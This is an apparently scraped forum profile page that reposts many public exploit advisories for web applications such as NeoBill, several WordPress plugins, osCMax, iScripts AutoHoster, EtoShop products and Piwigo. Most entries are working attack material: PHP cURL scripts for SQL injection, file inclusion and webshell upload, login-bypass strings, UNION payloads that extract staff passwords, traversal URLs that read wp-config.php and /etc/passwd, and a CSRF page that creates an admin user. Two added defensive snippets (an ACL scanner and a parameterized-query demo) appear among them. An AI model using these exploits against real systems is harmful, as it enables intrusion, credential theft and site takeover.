
Everything posted by HireHackking
-
NeoBill - '/install/include/solidstate.php' Multiple SQL Injections
source: https://www.securityfocus.com/bid/64112/info

NeoBill is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker can exploit these vulnerabilities to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, execute arbitrary commands, or execute local script code in the context of the application; the attacker may also obtain sensitive information that aids further attacks.

NeoBill 0.9-alpha is vulnerable; other versions may also be affected.

The POST fields username, firstname and email, and the language cookie, all reach SQL unescaped:

<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://[target]/install/include/solidstate.php");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
// inject in all three fields, or in only one ;)
curl_setopt($ch, CURLOPT_POSTFIELDS, "username='[SQLi]&firstname='[SQLi]&email='[SQLi]");
curl_setopt($ch, CURLOPT_COOKIE, "language='[SQLi]"); // SQLi via the language cookie
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_[target]"); // keep the session cookie the installer sets
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // return the body instead of printing it, so $buf is the response
$buf = curl_exec($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>
-
WordPress Plugin Advanced uploader 2.10 - Multiple Vulnerabilities
###########################################
#-----------------------------------------#
#[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]#
#-----------------------------------------#
#      *----------------------------*     #
# K    |....##...##..####...####....|   . #
# h    |....#...#........#..#...#...|   A #
# a    |....#..#.........#..#....#..|   N #
# l    |....###........##...#.....#.|   S #
# E    |....#.#..........#..#....#..|   e #
# D    |....#..#.........#..#...#...|   u #
# .    |....##..##...####...####....|   r #
#      *----------------------------*     #
#-----------------------------------------#
#[ Copyright (c) 2015 | Dz Offenders Cr3w]#
#-----------------------------------------#
###########################################
#    >> D_x . Made In Algeria . x_Z <<    #
###########################################
#
# [>] Title : Wordpress Plugin Advanced uploader v2.10 Multiple Vulnerabilities
#
# [>] Author : KedAns-Dz
# [+] E-mail : ked-h (@hotmail.com)
# [+] FaCeb0ok : fb.me/K3d.Dz
# [+] TwiTter : @kedans
#
# [#] Platform : PHP / WebApp
# [+] Cat/Tag : File Upload / Code Exec / Disclosure
#
# [<] <3 <3 Greetings t0 Palestine <3 <3
# [!] Vendor : http://www.wordpress.org
#
###########################################
#
# [!] Description :
#
# Wordpress plugin Advanced uploader v2.10 suffers from multiple vulnerabilities:
# a remote attacker can upload a file/shell/backdoor and execute commands, or disclose local files.
#
####

<?php
// page : upload.php
// lines : 1030 ... 1037
// upload.php accepts any file type without authentication
$postData = array();
$postData['file'] = "@k3d.php"; /* k3d.php : <?php system($_GET["dz"]); ?> */
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://[target].com/wp-content/plugins/advanced-uploader/upload.php");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$buf = curl_exec($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>

##################

<?php
// page : upload.php
// lines : 1219 ... 1237
// the "destinations" parameter is used as a path; %00 truncates whatever the script appends
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://[target].com/wp-content/plugins/advanced-uploader/upload.php?destinations=../../../../../../../../../wp-config.php%00");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$buf = curl_exec($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>

####
# <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !>
# Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3
#---------------------------------------------------------------
# Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 ,
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz , &
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &
# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day &
# PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ;
####
-
NeoBill 0.9-alpha - 'language' Local File Inclusion
source: https://www.securityfocus.com/bid/64112/info

NeoBill is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker can exploit these vulnerabilities to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, execute arbitrary commands, or execute local script code in the context of the application; the attacker may also obtain sensitive information that aids further attacks.

NeoBill 0.9-alpha is vulnerable; other versions may also be affected.

The installer's language parameter is used to build an include path. The trailing %00 (null byte) cuts off whatever suffix the script appends; that truncation only works on PHP versions before 5.3.4, which started rejecting paths containing a NUL.

<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://[target]/install/index.php");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, "language=[LFI]%00"); // LFI 1: via POST parameter
curl_setopt($ch, CURLOPT_COOKIE, "language=[LFI]%00");    // LFI 2: via cookie ^^
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_[target]");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$buf = curl_exec($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>
-
WordPress Plugin TheCartPress 1.4.7 - Multiple Vulnerabilities
###########################################
#-----------------------------------------#
#[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]#
#-----------------------------------------#
#      *----------------------------*     #
# K    |....##...##..####...####....|   . #
# h    |....#...#........#..#...#...|   A #
# a    |....#..#.........#..#....#..|   N #
# l    |....###........##...#.....#.|   S #
# E    |....#.#..........#..#....#..|   e #
# D    |....#..#.........#..#...#...|   u #
# .    |....##..##...####...####....|   r #
#      *----------------------------*     #
#-----------------------------------------#
#[ Copyright (c) 2015 | Dz Offenders Cr3w]#
#-----------------------------------------#
###########################################
#    >> D_x . Made In Algeria . x_Z <<    #
###########################################
#
# [>] Title : Wordpress Plugin TheCartPress v1.4.7 Multiple Vulnerabilities
#
# [>] Author : KedAns-Dz
# [+] E-mail : ked-h (@hotmail.com)
# [+] FaCeb0ok : fb.me/K3d.Dz
# [+] TwiTter : @kedans
#
# [#] Platform : PHP / WebApp
# [+] Cat/Tag : Multiple
#
# [<] <3 <3 Greetings t0 Palestine <3 <3
# [!] Vendor : http://thecartpress.com
#
###########################################
#
# [!] Description :
#
# Wordpress plugin TheCartPress v1.4.7 suffers from multiple vulnerabilities:
# a remote attacker can disclose local files or achieve remote code execution.
#
####

// page : Miranda.class.php
// lines : 111 .. 115

/* --[1] Local File Include -- */
<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://[target].com/wp-content/plugins/thecartpress/modules/Miranda.class.php?page=../../../../../../../../wp-config.php%00");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$buf = curl_exec($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>

/* --[2] Remote Code Execution -- */
<?php
// the "class" parameter is used unsanitized by the tcp_miranda_save_admin_panel AJAX action
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://[target].com/wp/admin-ajax.php?action=tcp_miranda_save_admin_panel&class=[RCE]");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$buf = curl_exec($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>

####
# <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !>
# Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3
#---------------------------------------------------------------
# Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 ,
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz , &
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &
# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day &
# PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ;
####
-
WordPress Plugin Easy Career Openings - 'jobid' SQL Injection
source: https://www.securityfocus.com/bid/64167/info

The Easy Career Openings plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/career-details/?jobid=3'[Sql Injection]
-
Cyclope Employee Surveillance 8.6.1 - Insecure File Permissions
# Author: loneferret of Offensive Security
# Product: Cyclope Employee Surveillance Solution (again)
# Version: <= 6.8.1
# Vendor Site: http://www.cyclope-series.com/
# Software Download: http://www.cyclope-series.com/download/index.html
# Link: http://www.cyclope-series.com/setups/setup.exe
# Software description:
# The employee monitoring software developed by Cyclope-Series is specially designed to inform
# and equip management with statistics relating to the productivity of staff within their organization.
# Vulnerability:
# Due to insecure file permissions, a low-privileged user could potentially
# delete, modify or replace many of the key executable files used, and needed,
# by the software.
# Although I haven't checked older versions, I do recall seeing the same file
# permissions being set, making this software extremely prone to lots of fun stuff.

''' File Information '''

A few files with odd-ball permissions. Keep in mind all files are like this: all files in c:\xampplite, as well as in Program Files.

The "CyclopeClient.exe" is what is pushed to workstations in order to monitor employees. As we can see, this file's permission is set to "Everyone". So is the uninstaller executable.

So, gain access to the system, and as a low-privileged user one can easily replace httpd.exe or mysqld.exe with an evil EXE file. Next time that file is executed, you'll get your shell as SYSTEM. Although they'll be out of a service...bummer

In the icacls output below, (I) marks an ACE inherited from the parent directory, so the weakness comes from the install directory's ACL rather than per-file settings; (M) is Modify, which includes write and delete, and (F) is Full Control. Either one on Everyone, Users or Authenticated Users lets any local account replace the binary; the (RX) entry for BUILTIN\Users is the normal read-and-execute grant.

# C:\xampplite\mysql\bin>icacls mysqld.exe
# mysqld.exe BUILTIN\Administrators:(I)(F)
#            NT AUTHORITY\SYSTEM:(I)(F)
#            BUILTIN\Users:(I)(RX)
#            NT AUTHORITY\Authenticated Users:(I)(M)
#
# Successfully processed 1 files; Failed processing 0 files
----
# C:\xampplite\apache\bin>icacls httpd.exe
# httpd.exe BUILTIN\Administrators:(I)(F)
#           NT AUTHORITY\SYSTEM:(I)(F)
#           BUILTIN\Users:(I)(RX)
#           NT AUTHORITY\Authenticated Users:(I)(M)
#
# Successfully processed 1 files; Failed processing 0 files
----
# C:\xampplite\mysql\bin>icacls mysql.exe
# mysql.exe BUILTIN\Administrators:(I)(F)
#           NT AUTHORITY\SYSTEM:(I)(F)
#           BUILTIN\Users:(I)(RX)
#           NT AUTHORITY\Authenticated Users:(I)(M)
#
# Successfully processed 1 files; Failed processing 0 files
----
# C:\Program Files\Cyclope\Client>icacls CyclopeClient.exe
# CyclopeClient.exe Everyone:(F)
#
# Successfully processed 1 files; Failed processing 0 files
----
# C:\Program Files\Cyclope>icacls unins000.exe
# unins000.exe Everyone:(F)
#
# Successfully processed 1 files; Failed processing 0 files
..
.. etc..
..
..
Way too many files to list; essentially whatever this thing installs is up for grabs.
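Checking an install tree by hand, one icacls call at a time, does not scale to "way too many files to list". The script below is an added example, not part of loneferret's advisory: it parses saved icacls output (the sample embedded here is constructed from the entries quoted above) and reports every ACE that gives a low-privileged principal a write-capable right. The principal and rights tables are my own choices and can be extended.

```python
import re

# Constructed sample: the icacls output quoted in the advisory, with the continuation
# lines indented the way icacls prints them.
SAMPLE_ICACLS = r"""
mysqld.exe BUILTIN\Administrators:(I)(F)
           NT AUTHORITY\SYSTEM:(I)(F)
           BUILTIN\Users:(I)(RX)
           NT AUTHORITY\Authenticated Users:(I)(M)

Successfully processed 1 files; Failed processing 0 files
CyclopeClient.exe Everyone:(F)

Successfully processed 1 files; Failed processing 0 files
unins000.exe Everyone:(F)

Successfully processed 1 files; Failed processing 0 files
"""

# Principals that every interactive or authenticated account belongs to (assumed list).
LOW_PRIV = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}

# icacls right codes that allow the holder to replace or alter the file:
# simple rights F (full) and M (modify) plus the specific write/delete rights.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WA", "DC", "WDAC", "WO"}

# "<principal>:(flag)(flag)..." ; (I), (OI), (CI) are inheritance flags, not rights.
_ACE = re.compile(r"^(?P<principal>.+?):(?P<perms>(?:\([^)]*\))+)\s*$")


def find_weak_aces(icacls_output):
    """Return (file, principal, rights) for every ACE that grants a low-privileged
    principal a write-capable right. The first line of each block starts with the
    file name; continuation lines are indented."""
    findings = []
    current_file = None
    for line in icacls_output.splitlines():
        if not line.strip() or line.startswith("Successfully processed"):
            continue
        if not line[0].isspace():
            current_file, _, line = line.partition(" ")
        m = _ACE.match(line.strip())
        if not m:
            continue
        principal = m.group("principal")
        flags = re.findall(r"\(([^)]*)\)", m.group("perms"))
        rights = {r for f in flags for r in f.split(",")}  # "(M)", "(RX)" or "(WD,AD)"
        writable = sorted(rights & WRITE_RIGHTS)
        if principal.lower() in LOW_PRIV and writable:
            findings.append((current_file, principal, ",".join(writable)))
    return findings


if __name__ == "__main__":
    for file_name, principal, rights in find_weak_aces(SAMPLE_ICACLS):
        print(f"{file_name}: {principal} has {rights}")
```

On a real host, feed it the output of `icacls "C:\xampplite" /t` and `icacls "C:\Program Files\Cyclope" /t` saved to a file; the `(I)` inheritance flag on most hits tells you the fix belongs on the directory ACL, not on each executable.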
-
WordPress Plugin PhotoSmash Galleries - 'bwbps-uploader.php' Arbitrary File Upload
source: https://www.securityfocus.com/bid/64173/info

The PhotoSmash Galleries plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because it fails to properly validate file extensions before uploading them. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

<?php
$uploadfile = "file.php";
$ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/photosmash-galleries/bwbps-uploader.php");
curl_setopt($ch, CURLOPT_POST, true);
// "@file" is the pre-PHP 5.5 cURL upload syntax; on current PHP use new CURLFile($uploadfile)
curl_setopt($ch, CURLOPT_POSTFIELDS, array('FileData' => "@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
-
eduTrac - 'showmask' Directory Traversal
source: https://www.securityfocus.com/bid/64255/info

eduTrac is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. A remote attacker could exploit the vulnerability using directory-traversal characters ('../') to access arbitrary files that contain sensitive information. Information harvested may aid in launching further attacks.

eduTrac 1.1.1 is vulnerable; other versions may also be affected.

http://www.example.com/installer/overview.php?step=writeconfig&showmask=../../eduTrac/Config/constants.php
-
BoastMachine - 'blog' SQL Injection
source: https://www.securityfocus.com/bid/64278/info

BoastMachine is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://example.com/user.php (POST parameter: blog)

Time-based blind payload (MySQL); a 25-second delay in the response confirms the injection:

blog='+(SELECT 1 FROM (SELECT SLEEP(25))A)+'
-
osCMax - Arbitrary File Upload / Full Path Information Disclosure
source: https://www.securityfocus.com/bid/64307/info

osCMax is prone to an arbitrary file-upload vulnerability and an information-disclosure vulnerability. Attackers can exploit these issues to obtain sensitive information and upload arbitrary files. This may aid in other attacks.

osCMax 2.5.3 is vulnerable; other versions may also be affected.

<?php
#-----------------------------------------------------------------------------
$shell = "<?php phpinfo(); ?>"; # U'r Sh3lL h3re !
$path  = "/temp/";              # Sh3lL Path (upload directory on the target)
#-----------------------------------------------------------------------------
# The Filedata part must come from a real local file, so write the payload to a
# temp file and post it under the name shell.php. CURLFile replaces the old
# "@file" syntax and lets us set the posted filename without hand-built headers
# (a custom Content-Type header would override cURL's multipart boundary).
$local = tempnam(sys_get_temp_dir(), "shl");
file_put_contents($local, $shell);
$ch = curl_init("http://www.example.com/oxmax/admin/includes/javascript/ckeditor/filemanager/swfupload/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array(
    'Filedata'   => new CURLFile($local, 'application/octet-stream', 'shell.php'),
    'uploadpath' => $path,
));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
unlink($local);
print "$postResult";
#-----------------------------------------------------------------------------
?>
-
C2C Forward Auction Creator 2.0 - '/auction/asp/list.asp?pa' SQL Injection
source: https://www.securityfocus.com/bid/64329/info

EtoShop C2C Forward Auction Creator is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.

EtoShop C2C Forward Auction Creator 2.0 is vulnerable; other versions may also be vulnerable.

http://www.example.com/C2CForwardAuction/auction/asp/list.asp?pa=[SQL INJECTION]
-
WinAsm Studio 5.1.8.8 - Buffer Overflow Crash (PoC)
********************************************************************************************
# Exploit: WinAsm Studio 5.1.8.8 BOF.
# Date: 12/6/2015
# Exploit Author: Un_N0n
# Vendor: WinAsm
# Software Link: http://www.winasm.net/winasm-studio-updates.html
# Version: 5.1.8.8
# Tested on: Windows 7 x64(64bit)
********************************************************************************************

[Info]

Code (decompiled):

  rc.right = 0;
  rc.bottom = 0;
  DrawTextExA(
    hdc,
    L"I \t\u6e69\u6c63\u6475e\u6e69\.................\uf64)",   <--- XXXtremely big string to draw, thus crashes.
    1,
    &rc,
    0x2CE0u,
    &dtp);
  *(_DWORD *)(a1 + 420) = rc.right;

[How to?]

1 - Open up WinAsm.exe.
2 - Go to Files -> Open Files.
3 - Browse to crash.txt and open it.
~ Software will crash.

[crash.txt?]

file = open('crash.txt', 'w')
file.write("A" * 20000)  # crash.txt contains 20000 As
file.close()

********************************************************************************************
-
C2C Forward Auction Creator - '/auction/casp/Admin.asp' SQL Injection (Admin Authentication Bypass)
source: https://www.securityfocus.com/bid/64329/info

EtoShop C2C Forward Auction Creator is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.

EtoShop C2C Forward Auction Creator 2.0 is vulnerable; other versions may also be vulnerable.

www.example.com/demo/C2CForwardAuction/auction/casp/admin.asp

UserID   : x' or ' 1=1--
Password : x' or ' 1=1--
-
Veno File Manager - 'q' Arbitrary File Download
source: https://www.securityfocus.com/bid/64346/info

Veno File Manager is prone to a vulnerability that lets attackers download arbitrary files because the application fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files within the context of the web server process. Information obtained may aid in further attacks.

The q parameter is base64-encoded; the value below decodes to a run of ../ segments followed by etc/passwd, so the encoding hides the traversal from a casual look at the URL but not from the script that decodes it:

http://www.example.com/filemanager/vfm-admin/vfm-downloader.php?q=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
-
Etoshop B2B Vertical Marketplace Creator - Multiple SQL Injections
source: https://www.securityfocus.com/bid/64332/info

B2B Vertical Marketplace Creator is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.

B2B Vertical Marketplace Creator 2.0 is vulnerable; other versions may also be vulnerable.

www.example.com/demo/B2BVerticalMarketplace/admin.asp

UserID   : 1' or '1' = '1
Password : 1' or '1' = '1
-
Icinga - cgi/config.c process_cgivars Function Off-by-One Read Remote Denial of Service
source: https://www.securityfocus.com/bid/64363/info

Icinga is prone to multiple memory-corruption vulnerabilities due to an off-by-one condition. Attackers may exploit these issues to gain access to sensitive information or crash the affected application, denying service to legitimate users.

http://www.example.com/cgi-bin/config.cgi?b=aaaa[..2000 times]
-
Piwigo - 'admin.php' Cross-Site Request Forgery (User Creation)
source: https://www.securityfocus.com/bid/64357/info

Piwigo is prone to cross-site request-forgery and HTML-injection vulnerabilities. Exploiting these issues may allow a remote attacker to perform certain unauthorized actions, execute arbitrary script or HTML code within the context of the browser, and steal cookie-based authentication credentials. Other attacks are also possible.

Piwigo 2.5.3 is vulnerable; other versions may also be affected.

The page below auto-submits the user-creation form. It succeeds only when the visiting browser holds a logged-in Piwigo administrator session; the missing per-request token on admin.php is what makes the request forgeable.

<html>
<head>
<title>POC</title>
</head>
<body>
<form action="http://www.example.com/cms/piwigo/admin.php?page=user_list" id="formid" method="post">
<input type="hidden" name="login" value="crsfpoc123" />
<input type="hidden" name="password" value="Password123@" />
<input type="hidden" name="email" value="xyz@aaww.com" />
<input type="hidden" name="send_password_by_mail" value="1" />
<input type="hidden" name="submit_add" value="Submit" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>
-
Dynamic Biz Website Builder (QuickWeb) 1.0 - '/apps/news-events/newdetail.asp?id' SQL Injection
source: https://www.securityfocus.com/bid/64371/info

EtoShop Dynamic Biz Website Builder (QuickWeb) is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.

EtoShop Dynamic Biz Website Builder (QuickWeb) 1.0.0 is vulnerable; other versions may also be affected.

http://www.example.com/dweb/apps/news-events/newdetail.asp?id=1=[SQL INJECTION]
-
Dynamic Biz Website Builder 'QuickWeb' 1.0 - '/login.asp' Multiple Field SQL Injections / Authentication Bypass
source: https://www.securityfocus.com/bid/64371/info

EtoShop Dynamic Biz Website Builder (QuickWeb) is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.

EtoShop Dynamic Biz Website Builder (QuickWeb) 1.0.0 is vulnerable; other versions may also be affected.

www.example.com/dweb/login.asp

UserID   : x' or ' 1=1--
Password : x' or ' 1=1--
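The C2C Forward Auction admin.asp, B2B Vertical Marketplace admin.asp and QuickWeb login.asp entries are the same bug three times: the login form's two fields are pasted into the SQL text. The block below is an added example (not EtoShop code) that reproduces the pattern against an in-memory SQLite table with a constructed admin row, shows the query the database actually receives for the B2B payload, and puts the parameterized version beside it. SQLite is used so it runs offline; the ASP products use a different engine but the string-splicing mistake is engine-independent.

```python
import sqlite3


def make_db():
    """Constructed sample data: one admin row. The password is stored in plaintext only to
    keep the demo short; hashing it would not change the injection shown below."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (UserID TEXT NOT NULL, Password TEXT NOT NULL)")
    db.execute("INSERT INTO admins VALUES ('admin', 'S3cret!')")
    return db


def rendered_query(user_id, password):
    """The query text the vulnerable pattern builds: request fields spliced into SQL."""
    return ("SELECT COUNT(*) FROM admins WHERE UserID = '" + user_id
            + "' AND Password = '" + password + "'")


def login_concat(db, user_id, password):
    """Vulnerable login: the attacker's quote closes the literal and the rest of the
    field becomes SQL, so  UserID='1' OR ('1'='1' AND Password='1') OR '1'='1'  is true."""
    return db.execute(rendered_query(user_id, password)).fetchone()[0] > 0


def login_parameterized(db, user_id, password):
    """Fixed login: values are bound, so a quote in the payload stays inside the literal
    and the lookup is for a user literally named  1' or '1' = '1  (which does not exist)."""
    sql = "SELECT COUNT(*) FROM admins WHERE UserID = ? AND Password = ?"
    return db.execute(sql, (user_id, password)).fetchone()[0] > 0


# The B2B Vertical Marketplace payload from the advisory, entered in both fields.
PAYLOAD = "1' or '1' = '1"

if __name__ == "__main__":
    db = make_db()
    print(rendered_query(PAYLOAD, PAYLOAD))
    print("concatenated  :", login_concat(db, PAYLOAD, PAYLOAD))
    print("parameterized :", login_parameterized(db, PAYLOAD, PAYLOAD))
```

Printing `rendered_query` is the useful habit here: reading the spliced statement makes it obvious why `AND` binds tighter than `OR` and why the password check is bypassed even though it is still present in the text.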
-
iScripts AutoHoster - 'checktransferstatus.php' SQL Injection
source: https://www.securityfocus.com/bid/64377/info

iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker can exploit these vulnerabilities to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks.

/checktransferstatus.php (POST; injectable parameter: cmbdomain)

Table name :
submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select distinct concat(0x7e,0x27,unhex(Hex(cast(table_name as char))),0x27,0x7e) from information_schema.tables where table_schema=database()limit 53,1),0x723078 and 'faris'='1337

Staff number :
submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select concat(0x3e3e,count(*),0x3c3c) from autohoster_staffs),0x723078 and 'faris'='1337

Staff Data :
submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select concat(0x3e3e,unhex(Hex(cast(vPassword as char))),0x5e,unhex(Hex(cast(vLogin as char))),0x5e,unhex(Hex(cast(vMail as char))),0x3c3c) from autohoster_staffs limit 0,1) ,0x723078 and 'faris'='1337

The /*!1337 prefix is a MySQL version-conditional comment, used here to slip the UNION past simple keyword filters. The hex literals are marker strings so the injected column is easy to spot in the response: 0x6661726973 = "faris", 0x723078 = "r0x", 0x3e3e and 0x3c3c = ">>" and "<<", 0x5e = "^", 0x7e = "~", 0x27 = "'". The limit offset (53) selects which table name is returned and is stepped to enumerate them one at a time.
-
iScripts AutoHoster - 'additionalsettings.php' SQL Injection
source: https://www.securityfocus.com/bid/64377/info

iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker can exploit these vulnerabilities to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks.

Time-based blind injection

/additionalsettings.php
POST : submit=faris&cmbdomain=%Inject_Here%
-
iScripts AutoHoster - 'invno' SQL Injection
source: https://www.securityfocus.com/bid/64377/info

iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker can exploit these vulnerabilities to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks.

/payinvoiceothers.php
invno=%Inject_Here%
-
iScripts AutoHoster - 'checktransferstatusbck.php' SQL Injection
source: https://www.securityfocus.com/bid/64377/info

iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker can exploit these vulnerabilities to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks.

/checktransferstatusbck.php (POST; injectable parameter: cmbdomain; same payloads as checktransferstatus.php)

Table name :
submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select distinct concat(0x7e,0x27,unhex(Hex(cast(table_name as char))),0x27,0x7e) from information_schema.tables where table_schema=database()limit 53,1),0x723078 and 'faris'='1337

Staff number :
submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select concat(0x3e3e,count(*),0x3c3c) from autohoster_staffs),0x723078 and 'faris'='1337

Staff Data :
submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select concat(0x3e3e,unhex(Hex(cast(vPassword as char))),0x5e,unhex(Hex(cast(vLogin as char))),0x5e,unhex(Hex(cast(vMail as char))),0x3c3c) from autohoster_staffs limit 0,1) ,0x723078 and 'faris'='1337
-
iScripts AutoHoster - 'main_smtp.php' Traversal
source: https://www.securityfocus.com/bid/64377/info

iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker can exploit these vulnerabilities to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks.

/support/parser/main_smtp.php

^ Just a light sandwich before the fatty food :))
-
SIMOGEO FileManager 2.3.0 - Multiple Vulnerabilities
# Exploit Title: SIMOGEO FileManager 2.3.0 - Path Traversal Vulnerability
# Date: 2015-12-09
# Exploit Author: HaHwul
# Exploit Author Blog: http://www.codeblack.net
# Vendor Homepage: https://github.com/simogeo/Filemanager
# Software Link: git clone http://github.com/simogeo/Filemanager.git
# Version: 2.3.0
# Tested on: Debian [Wheezy]
# CVE : none

Path Traversal Code

http://192.168.0.15/vul_test/target/Filemanager/connectors/php/filemanager.php?mode=preview&path=//....//....//....//....//....//....//....//....//....//etc/passwd

Filtering Rules : "../" -> blank (every "../" is deleted in a single pass)
